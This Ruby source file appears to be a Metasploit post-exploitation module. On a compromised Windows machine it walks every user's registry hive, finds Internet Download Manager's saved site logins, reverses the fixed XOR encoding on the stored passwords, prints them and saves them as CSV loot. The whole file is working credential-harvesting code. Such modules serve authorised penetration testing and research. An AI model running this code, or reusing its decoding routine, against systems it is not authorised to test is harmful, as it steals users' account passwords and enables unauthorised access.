GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/windows/gather/credentials/idm.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
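class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # Path, relative to a user's HKU hive, of the key under which IDM keeps one
  # subkey per site; each site subkey carries the 'User' and 'EncPassword' values.
  IDM_PASSWORDS_SUBKEY = 'Software\\DownloadManager\\Passwords'

  # Single-byte key IDM XORs over every byte of 'EncPassword'. A fixed XOR is
  # obfuscation, not encryption: anyone who can read the hive recovers the
  # password, so these registry values should be treated as cleartext secrets.
  IDM_XOR_KEY = 15

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Internet Download Manager (IDM) Password Extractor',
        'Description' => %q{
          This module recovers the saved premium download account passwords from
          Internet Download Manager (IDM). These passwords are stored in an encoded
          format in the registry. This module traverses through these registry entries
          and decodes them. Thanks to the template code of theLightCosine's CoreFTP
          password module.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Walk every loaded user hive under HKU, decode the IDM site credentials each
  # one holds, and store the combined table once as CSV loot.
  #
  # registry_enumkeys may return nil when the key list cannot be read, so the
  # result is wrapped in Array() instead of calling .each on it directly. The
  # loot file is written a single time after all hives are processed; writing
  # it once per user would repeat the cumulative table in every file.
  def run
    creds = Rex::Text::Table.new(
      'Header' => 'Internet Downloader Manager Credentials',
      'Indent' => 1,
      'Columns' => %w[User Password Site]
    )

    Array(registry_enumkeys('HKU')).each do |k|
      # Only real user SIDs (S-1-5-21-...); well-known SIDs and the
      # "<SID>_Classes" hives never hold IDM data.
      next unless k.include?('S-1-5-21')
      next if k.include?('_Classes')

      print_status("Looking at Key #{k}")

      begin
        idm_site_credentials(k).each { |row| creds << row }
      rescue StandardError => e
        # Best effort: one unreadable hive must not stop the remaining users.
        print_error("An error has occurred: #{e}")
      end
    end

    if creds.rows.empty?
      print_status('No IDM credentials found.')
      return
    end

    print_status('Storing data...')
    begin
      path = store_loot(
        'idm.user.creds',
        'text/csv',
        session,
        creds.to_csv,
        'idm_user_creds.csv',
        'Internet Download Manager User Credentials'
      )
      print_good("IDM user credentials saved in: #{path}")
    rescue StandardError => e
      print_error("An error has occurred: #{e}")
    end
  end

  # Undo IDM's 'EncPassword' encoding by XORing every byte with +key+.
  # XOR with a constant is its own inverse, so the same call also encodes.
  #
  # @param ciphertext [String] raw bytes of the registry value
  # @param key [Integer] single-byte key, 0..255 (defaults to IDM's 15 / 0x0F)
  # @return [String] decoded bytes; an empty String for empty input
  def xor(ciphertext, key = IDM_XOR_KEY)
    ciphertext.unpack('C*').map { |byte| byte ^ key }.pack('C*')
  end

  private

  # Read every site subkey under one user's IDM Passwords key.
  #
  # @param sid [String] HKU subkey name (the user's SID)
  # @return [Array<Array(String, String, String)>] [user, password, site] rows;
  #   empty when IDM is not installed for that user or no entry carries a password
  def idm_site_credentials(sid)
    base = "HKU\\#{sid}\\#{IDM_PASSWORDS_SUBKEY}"
    sites = registry_enumkeys("#{base}\\")

    if sites.nil? || sites.empty?
      print_status('IDM not installed for this user.')
      return []
    end

    sites.each_with_object([]) do |site, rows|
      site_key = "#{base}\\#{site}"
      user = registry_getvaldata(site_key, 'User')
      epass = registry_getvaldata(site_key, 'EncPassword')
      # Entries without a stored password are skipped rather than reported empty.
      next if epass.nil? || epass == ''

      pass = xor(epass)
      print_good("Site: #{site} (User=#{user}, Password=#{pass})")
      rows << [user, pass, site]
    end
  end
end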